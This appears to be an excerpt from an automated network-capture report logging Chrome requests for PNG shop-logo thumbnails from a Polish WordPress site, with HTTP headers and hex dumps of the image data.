                                                            2025-01-15 10:08:09 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ed 9d 09 7c 14 45 fa fe df b9 72 4c 2e 92 70 13 08 97 04 02 48 e4 10 44 45 10 5c 04 75 e5 f4 5a 71 3d 56 e5 f0 c0 15 05 f1 da 75 3d 11 d7 55 d7 03 fd b9 eb ba 8a fe 75 17 10 39 54 c0 0b 95 43 90 4b 90 c3 08 84 1b 42 20 84 64 32 f7 bf 9e 22 9d 9d 84 99 64 3a e9 ce 74 e3 fb cd a7 3f 33 99 e9 a3 a6 fa e9 a7 de aa ae ae b2 07 83 41 32 22 f6 58 27 20 12 9c 30 b5 9c 19 09 db b5 6b 57 b0 6d db b6 f5 39 9e 25 da 15 d5 24 ac be 89 92 fb a0 28 13 d7 e0 a7 72 f5 ea d5 6b cf 3d f7 dc 5e b5 ad d7 e0 09 2b 29 29 e9 19 cd 7a 67 86 f8 1b 12 4e 98 5a 54 27 ac 74 de c3 94 34 e2 2f 55
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATx|ErL.pHDE\uZq=Vu=Uu9TCKB d2"d:t?3A2"X' 0kWm9%$(rk=^+))zgNZT't4/U
                                                            2025-01-15 10:08:09 UTC5636INData Raw: af ea e9 a8 fe b9 f2 3f 0b 4b 05 bf a6 a2 b0 be b0 b0 54 a0 04 a3 91 6e dc 86 bb ea c3 39 45 b8 9b cc a1 df 57 df 2e dc f6 91 5a dd 6b fa bc fa b1 c3 a5 3d d2 0d f0 48 ee 1c 29 bd 2c 2c 15 84 de 03 0b 97 71 b5 65 66 6d 99 af 66 fb 60 98 cf a2 f9 bc 2e ff 87 db a7 21 85 53 1b 67 5c 7f 71 86 61 ce 5c 8c 5a 12 32 0c c3 9c 06 1b 16 c3 30 a6 81 0d 8b 61 18 d3 c0 86 c5 30 8c 69 60 c3 62 18 c6 34 b0 61 31 0c 63 1a d8 b0 18 86 31 0d 6c 58 0c c3 98 06 36 2c 86 61 4c 03 1b 16 c3 30 a6 81 0d 8b 61 18 d3 c0 86 c5 30 8c 69 60 c3 62 18 c6 34 b0 61 31 0c 63 1a d8 b0 18 86 31 0d 6c 58 0c c3 98 06 36 2c 86 61 4c 03 1b 56 c3 63 77 b9 5c 77 15 15 15 0d 2f 29 29 c9 75 bb dd 69 3e 9f cf 19 eb 44 31 b5 e3 70 38 4a e3 e2 e2 4a 52 52 52 36 67 64 64 2c 4a 4c 4c 7c 91 78 a0 f8 06
                                                            Data Ascii: ?KTn9EW.Zk=H),,qefmf`.!Sg\qa\Z20a0i`b4a1c1lX6,aL0a0i`b4a1c1lX6,aLVcw\w/))ui>D1p8JJRRR6gdd,JLL|x


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            143192.168.2.1649207178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:08 UTC416OUTGET /wp-content/uploads/2015/07/selgros_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:09 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:09 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:08 GMT
                                                            ETag: "3ebd-620a8b41d30a2"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 16061
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:09 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ed 9d 07 98 14 45 da c7 df cd cb 66 96 0c 0b 0b 2c b0 04 91 1c 44 05 31 9e 98 48 e6 1c 31 eb a9 9f 7a e6 70 ea a9 e7 99 31 9c 18 50 cc 88 c7 09 8a 28 7a 62 02 91 28 28 48 da 25 c3 ee c2 b2 6c 4e df ff 9d 9a 66 7a 67 7b 76 ba 77 a7 99 6e 78 7f cf d3 cf f4 74 57 57 57 57 bf f5 af b7 aa ab ab a3 6b 6b 6b c9 89 44 87 3b 01 81 90 84 59 e5 e0 48 d8 c6 8d 1b 6b 3b 77 ee dc 94 f3 45 98 0d 68 25 61 4d 4d 94 27 0e 32 99 b8 03 7e 2b 17 2e 5c f8 eb d0 a1 43 07 05 0b 77 c0 13 56 54 54 34 d0 4c b8 83 c3 f8 0f 24 d6 12 96 9d 0d d3 35 5d b0 ea f3 c7 1f a6 83 5a 4b 58 b7 6e 44 b3 67
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATxEf,D1H1zp1P(zb((H%lNfzg{vwnxtWWWWkkkD;YHk;wEh%aMM'2~+.\CwVTT4L$5]ZKXnDg
                                                            2025-01-15 10:08:09 UTC8000INData Raw: b0 7c 1c f5 02 6a c0 fb 94 aa 30 7f fb 05 f7 20 56 55 89 cd 1f 55 37 69 3a 8c ec ce fe b8 71 9f 10 fd 25 03 61 1f 53 61 d9 af f9 63 87 0a 1b cf d5 24 14 29 a6 55 dd f8 77 57 29 df 8a 8d 50 e3 43 a8 d1 59 a8 4e 09 61 5b e2 1c 79 77 f9 ce df fe 1f 44 5f 4d 52 eb 9e ea ab 56 ed 7b e5 3c df 79 f2 50 3d ae 47 d5 99 0f 03 8f f8 9b 0a 1b 8f 56 de b1 93 95 0f f8 32 c2 5e ad 7b 08 e0 d1 27 97 1a 15 e3 1a c3 ca e7 fa 8e fb b0 d8 81 e7 01 04 0f 90 ca 7d fe 9f aa 7e 3d 37 2c 45 2d 13 5e 27 d5 15 85 b0 71 f7 f9 45 06 ff 67 10 57 35 b5 6a 7d 3e 7c af 88 85 2a ac e7 1c 68 19 b6 7f 9c ea 7e f3 81 cf e5 6d 65 e6 c7 2a 07 9b d8 30 ab 55 1c c3 9f f1 c5 cd f1 7a d2 a2 3d a2 f4 9e 27 eb 71 6f 7a 93 bd fb 63 54 da 3d eb 11 de 63 93 bc ff 9b 51 dd 3e 3b 97 75 be bb c6 b0 9e 81
                                                            Data Ascii: |j0 VUU7i:q%aSac$)UwW)PCYNa[ywD_MRV{<yP=GV2^{'}~=7,E-^'qEgW5j}>|*h~me*0Uz='qozcT=cQ>;u
                                                            2025-01-15 10:08:09 UTC126INData Raw: 8b df e8 9a 03 e5 bb d9 f8 42 71 3f cc 3c 9d 95 4e 77 93 88 60 99 87 bd 2b e9 1c 15 ec 40 9a 83 26 11 c1 b2 86 4c c8 26 08 61 44 04 cb 3c ec b6 07 13 2c 2b af 99 84 1a 33 af a8 98 e9 53 21 83 fd 56 fb 90 02 0d c0 34 13 6f b0 be 21 ab e1 cc 60 26 ad 0d ed b3 9a 16 2b 7d 98 82 0e 11 2c f3 b0 51 c9 3b 60 82 10 46 fe 1f f5 78 aa a3 f6 7f 33 7d 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: Bq?<Nw`+@&L&aD<,+3S!V4o!`&+},Q;`Fx3}IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            144192.168.2.1649208178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:09 UTC414OUTGET /wp-content/uploads/2015/07/pepco_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:09 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:09 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:23 GMT
                                                            ETag: "5834-620a8b4fa6071"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 22580
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:09 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ec 5d 07 60 14 d5 d6 fe 66 66 fb 66 37 3d 01 42 08 a1 77 e9 20 3e e4 09 2a a2 3c 2c a8 60 ef 0a f6 de fb 7b 76 9f f5 d9 78 a2 cf 5e 50 54 54 14 51 50 51 29 3f 55 04 91 16 92 40 42 7a d9 6c 9f 9d f9 cf bd bb 0b 21 24 b0 81 0d bb 0b f3 e9 b0 9b dd 99 3b 67 ef 7c f7 bb e7 dc aa 53 55 15 f1 08 5d ac 0d 68 09 9a 61 ad c5 e1 61 d8 b6 6d db d4 ce 9d 3b 1f cc fd 84 48 4f 6c 8d 61 07 6b 14 4f 03 11 1a 77 c8 1f e5 b2 65 cb 56 0c 1f 3e 7c c8 fe ce 3b e4 86 39 1c 8e c1 91 9c 17 b1 61 e2 bf 16 1d b8 35 8d 30 ff e8 c8 ce 8b 3c c7 76 38 22 3c 51 a1 5f 41 47 40 82 28 28 f4 97 d4 e4
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATx]`fff7=Bw >*<,`{vx^PTTQPQ)?U@Bzl!$;g|SU]haam;HOlakOweV>|;9a50<v8"<Q_AG@((
                                                            2025-01-15 10:08:09 UTC8000INData Raw: 24 d0 88 d5 04 22 55 6b 0a 55 63 6a 45 26 f4 3a 3f ce 1c be 00 4f 4f 7c 05 1d 92 cb 83 04 62 5b 47 b1 da cd db e4 42 01 fb df d9 46 c6 ae 6d 2b f3 8d 3b f0 dd d5 d3 00 2b b0 70 db 10 8c 7d ea 3f 10 33 6a a0 ee aa 3a 23 b0 55 8c df 3a 55 23 16 47 70 1f 24 b5 22 1d 29 16 07 66 5c fc 4f 9c de eb 17 f2 f3 94 e0 33 66 cf 8f bd b2 5d 14 2d fc 54 0a f5 05 5e d5 31 30 ff 8a 9f 13 26 16 3b 37 b4 c1 b0 22 88 9c ac 7b c9 59 e8 5c d5 6d c0 df 33 d6 42 7d e9 68 9c f9 e6 d3 f8 74 cd d1 10 52 6a db fa 07 b7 39 8e 78 62 a9 15 a9 48 36 ba f0 c1 f4 7b 30 a1 fb 52 54 d4 a7 60 d5 ce 9e 98 fa ce 63 58 5b 90 8f 52 47 2a 6a 7d 49 8c 21 c1 0b 84 10 41 18 99 98 ba 88 f4 b7 1c 62 15 91 0d 42 00 26 9d 0f 39 f6 4a 1c 3d 60 15 6e 19 f5 31 06 64 6f 21 75 51 77 6f 94 d7 48 d9 04 c5 b7
                                                            Data Ascii: $"UkUcjE&:?OO|b[GBFm+;+p}?3j:#U:U#Gp$")f\O3f]-T^10&;7"{Y\m3B}htRj9xbH6{0RT`cX[RG*j}I!AbB&9J=`n1do!uQwoH
                                                            2025-01-15 10:08:09 UTC6645INData Raw: 54 82 81 08 d3 00 9f 4e 40 e7 0d 6b 61 e8 de 63 df 29 ca 7e 78 7f 5e 84 d2 73 2e 82 a1 bc 12 5e 2a f0 19 d7 5f 87 d4 e7 9f d9 eb dc c6 0d ec 8d ff 76 7f 3b 1f 3b 26 8c 07 ba f6 46 de c6 d5 10 58 83 77 33 08 17 47 b9 a1 1e ae 0f 3e 46 c5 35 37 c1 18 60 c3 9b 8c 24 1c 32 79 3e 7e d4 d1 2f 49 9b 70 22 32 9e 7b 1a ba 1e 3d 76 4d 05 0c 77 de f1 91 11 74 b8 e6 ce c5 f6 53 4e 47 92 44 21 30 b9 38 1e d5 03 cb e0 21 48 7f e5 79 18 87 0f 63 a3 b9 1a c9 e6 9e 96 ab e4 71 79 e6 7e 83 ed 17 5d 01 b1 ba 0e 16 12 78 51 56 50 eb 72 a2 dd 8b 2f 62 b0 d5 88 e5 97 4f 45 83 de 88 b3 2f 7d 16 cb 72 7b 72 e1 62 8d ed 4a 76 05 16 16 f6 47 97 7b 3f c7 ea fb ce 43 ba a1 8e 8f f7 72 f9 4d d8 e1 c8 00 0c 6a 70 28 47 40 13 9f 43 01 4d b0 e2 12 2a 9f db 16 c8 b5 e3 85 59 4f e0 a2 55
                                                            Data Ascii: TN@kac)~x^s.^*_v;;&FXw3G>F57`$2y>~/Ip"2{=vMwtSNGD!08!Hycqy~]xQVPr/bOE/}r{rbJvG{?CrMjp(G@CM*YOU


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            145192.168.2.1649209178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:09 UTC653OUTGET /wp-content/uploads/2015/07/smyk_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:09 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:09 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:17 GMT
                                                            ETag: "693a-620a8b4a34809"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 26938
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:09 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ec 9d 07 60 14 45 17 c7 ff d7 5b 2e bd f7 06 81 d0 02 a1 37 41 8a 02 0a 0a a2 20 a2 d8 90 f2 a1 a2 02 0a d8 15 15 0b 8a 8a 8a 05 a4 88 82 22 a0 88 88 14 a5 87 9a 40 42 4d 48 ef fd 92 eb e5 7b bb 97 40 08 09 24 70 47 ee 70 7f ba dc 65 6f 77 f6 ed ec 7f df bc 99 9d 9d 11 5a 2c 16 38 22 c2 96 36 a0 31 38 c3 9a cb ad 61 58 7a 7a ba 25 3c 3c fc 46 8e c7 6b ea 86 cd 31 ec 46 8d 62 d3 40 13 8d bb e9 97 32 21 21 e1 48 f7 ee dd e3 af b5 dd 4d 37 4c a5 52 75 69 ca 76 b7 86 f8 eb 73 2a b7 1c b1 f3 ff 40 17 97 32 1c ad f2 84 e5 bb f1 57 6c f3 e9 b4 6d 28 ae 4e c6 c8 09 83 11 3f
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATx`E[.7A "@BMH{@$pGpeowZ,8"618aXzz%<<Fk1Fb@2!!HM7LRuivs*@2Wlm(N?
                                                            2025-01-15 10:08:09 UTC8000INData Raw: 98 62 f1 56 1c 12 b2 39 30 5e aa aa aa 0a 5b b6 6c 31 dd 75 d7 5d 7d 14 0a c5 c1 96 b6 a9 31 1c 56 58 35 68 ef bd f7 de 27 29 48 7d 69 d3 a6 4d 73 a9 58 9c d9 b9 73 67 b8 b9 b9 b1 22 fb 2f 78 31 a3 d1 c8 ce 07 9e 93 93 c3 cc b7 ab 7a e8 a1 87 c6 3c f0 c0 03 3b 50 d3 b1 d5 51 71 74 61 b1 90 80 8a 29 de 7a 8e be 3e 47 77 ad 5f 46 46 c6 90 3f fe f8 63 98 4a a5 1a ee eb eb eb 4a 22 bb b2 4b 80 13 c3 dc 30 15 15 15 c6 e2 e2 e2 f3 bd 7b f7 fe a5 57 af 5e 9b 62 62 62 8e d1 e2 34 03 dc 3a 85 b0 ea c2 14 91 11 11 11 ab a6 4f 9f ce f4 9e 93 93 37 63 a2 fb 86 5f e9 71 5e d8 f9 0c 49 60 4c 8d cf 69 c4 54 17 67 12 96 80 82 d6 00 8d 46 d3 41 24 12 c9 98 79 a7 99 3b fb 56 2d 0e 99 36 2a 26 a6 62 02 75 2a 0e 99 d9 c2 d3 28 14 48 85 93 cc 63 eb 0c c2 12 e9 74 ba 8e 24 24
                                                            Data Ascii: bV90^[l1u]}1VX5h')H}iMsXsg"/x1z<;PQqta)z>Gw_FF?cJJ"K0{W^bbb4:O7c_q^I`LiTgFA$y;V-6*&bu*(Hct$$
                                                            2025-01-15 10:08:09 UTC8000INData Raw: 2c 0e 0e 0e a7 81 73 58 1c 1c 1c 4e 03 e7 b0 9a 09 d7 ee c0 61 2b 38 2d 35 1f ce 61 71 b0 98 99 fe 40 66 33 fb 9d e9 23 c4 ab f9 e4 73 1d 64 39 1c 08 ce 61 35 13 3e 9f ef 74 bd dc 67 ae 3e 88 25 6b 77 42 af af 33 e0 25 4f 04 f6 f2 f3 84 d6 4f f0 c1 0e 57 6e f2 26 ef 55 e7 fc f8 46 40 90 4d e1 80 8a 16 e6 75 37 73 9d 94 79 d6 fd 98 fc 60 a2 05 8b 09 01 de 72 fc fd de 24 c4 06 79 dc 84 33 6b 3a 5a b5 0e 5f bc be 0c a5 b9 95 74 0d 79 ac e9 b5 8e d9 02 01 fd eb 09 be 50 06 89 54 0f 89 c2 04 0f b9 12 81 e1 be f0 0d f5 80 9b 8f 1b 64 4a 19 64 0a 31 c4 32 31 44 62 21 04 42 41 4b 9f d2 7f 12 ce 61 35 13 47 09 e3 4d 1a 0d 4c a5 a5 e4 4c 84 10 fb fb 35 ba dd e2 ed 29 f8 78 d5 df 40 40 04 50 e4 ce ae 1b 39 ec 2f 0c 6f 7b 12 73 bf 9a 8c d2 72 72 2c 02 23 7a 44 9f c3
                                                            Data Ascii: ,sXNa+8-5aq@f3#sd9a5>tg>%kwB3%OOWn&UF@Mu7sy`r$y3k:Z_tyPTdJd121Db!BAKa5GMLL5)x@@P9/o{srr,#zD
                                                            2025-01-15 10:08:09 UTC3003INData Raw: b9 ab 07 e8 da ec 1a 93 89 ec 4f 36 40 43 69 fc 38 eb 12 34 d3 ef 86 dd 72 1b 94 04 ab 7d 17 4d 41 e3 ae ef 91 4e 10 8f 9e 75 b9 08 49 6b 41 01 e4 f1 09 62 3e 59 4f a4 c0 de 92 bd fc 5f 18 f4 ea 1b d0 4d 9a 8c 9f 26 4f 40 cd 07 ff 85 e1 9e fb a0 34 f4 3b f5 e4 3c ad 67 47 e4 ea 29 71 60 f5 92 3c 56 1b 3c f4 24 96 b2 f1 66 41 c3 38 9c 04 8b d2 07 fe 0f 16 82 c7 f0 65 2f 90 45 91 0f a9 4a 09 c3 d3 ff 82 9c 60 25 56 05 8d c6 37 5a c7 ff 72 d0 c0 2b b4 02 31 99 43 a8 b2 97 de 71 0b 59 0e 6f e2 60 d6 10 38 1a cd 90 27 24 20 73 c3 16 72 15 23 db cd 93 ab de 08 67 5d 0d b4 c9 fd a8 22 9e 80 93 5c ab f5 1d b7 55 cf a5 44 ea 1b a3 57 4f 90 91 47 68 60 78 e6 39 71 8c 24 b3 c0 24 6a 35 3c 74 2e e2 dc ed 6d 89 d6 b3 e1 2b 8d 94 64 e6 c7 eb a0 1e 3c 14 95 ba 28 58 18
                                                            Data Ascii: O6@Ci84r}MANuIkAb>YO_M&O@4;<gG)q`<V<$fA8e/EJ`%V7Zr+1CqYo`8'$ sr#g]"\UDWOGh`x9q$$j5<t.m+d<(X


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            146192.168.2.1649211178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:09 UTC414OUTGET /wp-content/uploads/2015/07/makro_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:09 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:09 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:12 GMT
                                                            ETag: "3781-620a8b458e190"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 14209
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:09 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ed 9d 07 7c 14 65 fa c7 7f b3 25 7d d3 09 24 04 02 86 1a 44 90 2e 1e 58 c0 5e 01 bb 62 bd 53 8a 9e e5 f4 6f c1 86 80 a7 9e e5 10 c5 76 7a ea d9 4e 4f f4 38 1b 22 d6 f3 50 54 aa 01 a5 a7 11 08 e9 7d eb fc 9f 77 66 37 59 c2 6e b2 93 ec 66 67 e3 f3 fd 7c 26 d9 9d f2 ce 33 ef fe e6 37 cf bc f3 ce 8c 49 96 65 e8 11 53 b8 03 f0 07 07 a6 95 9e 11 d8 de bd 7b e5 01 03 06 74 65 7d 52 a0 33 6a 09 ac ab 41 29 65 20 c0 e0 ba fd a7 5c b7 6e dd 4f 13 26 4c 18 db d1 7c dd 1e 58 5d 5d dd 98 40 e6 eb 19 e2 ef 4e 02 0e cc 70 dc bd 41 59 e1 ea 7b 8f 0b 68 be a0 d6 d8 3b b7 fe 07 e7 3f
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATx|e%}$D.X^bSovzNO8"PT}wf7Ynfg|&37IeS{te}R3jA)e \nO&L|X]]@NpAY{h;?
                                                            2025-01-15 10:08:09 UTC6274INData Raw: 43 a6 dd 6e cf a4 ed 6e 8a 8d 8d dd e2 3e 34 46 84 8b 45 82 b0 c4 2e 9c 46 95 3b 96 ce 00 4d 54 b9 36 f7 78 4f c6 de 56 59 be 32 79 cf b3 b8 bd 5e 1a 77 c8 f3 b9 db 7e 46 9b f9 03 59 9f bf b2 7d ad df d7 b2 de cb 09 77 55 ce 76 c5 b5 52 da 6e c9 e1 70 1c 45 2e 96 48 9f 77 42 7d d5 93 ae d1 bd b0 48 54 bd 68 af 1d 49 87 04 91 77 44 c4 de 1a 6c 84 c0 28 97 14 17 9f b3 28 0d 88 25 b1 6d 86 df f7 66 e8 03 bd 0b cb 42 7b e9 10 da 4b 75 bf 87 76 07 e2 92 16 d5 45 1c b9 d7 40 4a 07 84 73 e9 b6 0b a9 9e 85 65 a2 0a 1c 4c 15 d8 91 a8 7c bf 72 22 30 da 5b d6 d7 a1 cd d7 fc de f3 b5 57 6e 67 e2 3c ac 6c 71 8c 24 81 25 93 93 a7 88 eb a9 1a cb eb 36 74 2b 2c aa b8 24 12 95 38 f4 75 f6 f0 e7 2b af 0a 74 99 ae ce d3 95 f5 74 18 af 70 2e 3a 2c 8a b3 62 f1 68 7a 5d b6 73
                                                            Data Ascii: Cnn>4FE.F;MT6xOVY2y^w~FY}wUvRnpE.HwB}HThIwDl((%mfB{KuvE@JseL|r"0[Wng<lq$%6t+,$8u+ttp.:,bhz]s


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            147192.168.2.1649210178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:09 UTC656OUTGET /wp-content/uploads/2015/07/toysrus_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:09 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:09 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:13 GMT
                                                            ETag: "41df-620a8b465261f"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 16863
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:09 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ed 9d 07 7c 14 d5 da c6 9f dd 9d d9 5e d2 3b 84 80 80 04 11 04 01 45 2c 88 05 2b 55 45 ac d8 fb f5 de ab 62 e5 5e 7b c1 ce 67 6f 28 d8 0b 82 15 b8 88 8a a2 20 08 88 14 1b 90 90 90 de b3 bd 7d ef 99 cd 86 24 6c 92 dd b0 cb ce e2 f9 f3 1b b2 3b f5 9d b3 cf 3c e7 3d 67 9a e0 f7 fb 21 47 84 78 07 d0 19 3c b0 48 39 30 02 db b9 73 a7 bf 4f 9f 3e fb b2 3d 45 b8 33 46 12 d8 be 06 25 ad 03 61 06 b7 df 7f ca 35 6b d6 ac 1b 35 6a d4 88 ee e6 db ef 81 35 35 35 0d 0f 67 be 03 43 fc fb 93 bf 4f 60 ba 4b 17 c2 ef f5 c3 59 5d 02 ff a7 37 f4 78 3d 11 05 56 9d 7b 3e 3c cd 95 30 7f 31
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATx|^;E,+UEb^{go( }$l;<=g!Gx<H90sO>=E3F%a5k5j555gCO`KY]7x=V{><01
                                                            2025-01-15 10:08:09 UTC8000INData Raw: 26 8c 0d 3c 94 f7 ec c1 97 e1 e5 8d 77 4a db ce 34 5b f0 fe d6 a7 91 9e 61 a1 f9 bd 18 98 32 02 a2 4a 0d e5 d7 bf 40 97 94 45 79 d5 04 38 92 8c 50 37 d9 21 6a f7 38 b1 df 69 85 aa 0f af 0a a3 8e 7a e4 40 58 ed d4 9a 62 55 95 5e 87 8a eb 1e 46 de 67 4f 40 73 e7 ff 60 bf 67 3c 94 79 26 12 16 ed 96 cf 03 7f 69 13 54 97 3d 05 4d bf 63 70 ee f3 87 21 af 7f 16 09 82 25 c8 0a ec ae a8 c6 fc 19 6b 5a d7 6b 39 ef 78 d8 0e ca 41 2d 25 ec ba 5a 1a 61 48 0b 74 ca da 6d 68 d0 b8 d0 f7 8d 7b b0 6e 67 0d de 5d b2 83 aa ba 3d 7d 50 cc a9 fc 0d 45 58 76 c7 3f f1 e3 1f 55 38 e1 91 ef db 75 8f b8 5c 7e cc 3c ae bf f4 79 50 da 28 34 94 3a 61 c9 d5 40 a5 08 14 7d ad bd 1e 59 c2 00 dc 79 cc b3 d2 f7 8c 9f 5e 43 dd e8 4b 20 98 b3 60 20 a1 42 a3 dd b3 3e da 58 a3 ce 8f b4 ec d8
                                                            Data Ascii: &<wJ4[a2J@Ey8P7!j8iz@XbU^FgO@s`g<y&iT=Mcp!%kZk9xA-%ZaHtmh{ng]=}PEXv?U8u\~<yP(4:a@}Yy^CK ` B>X
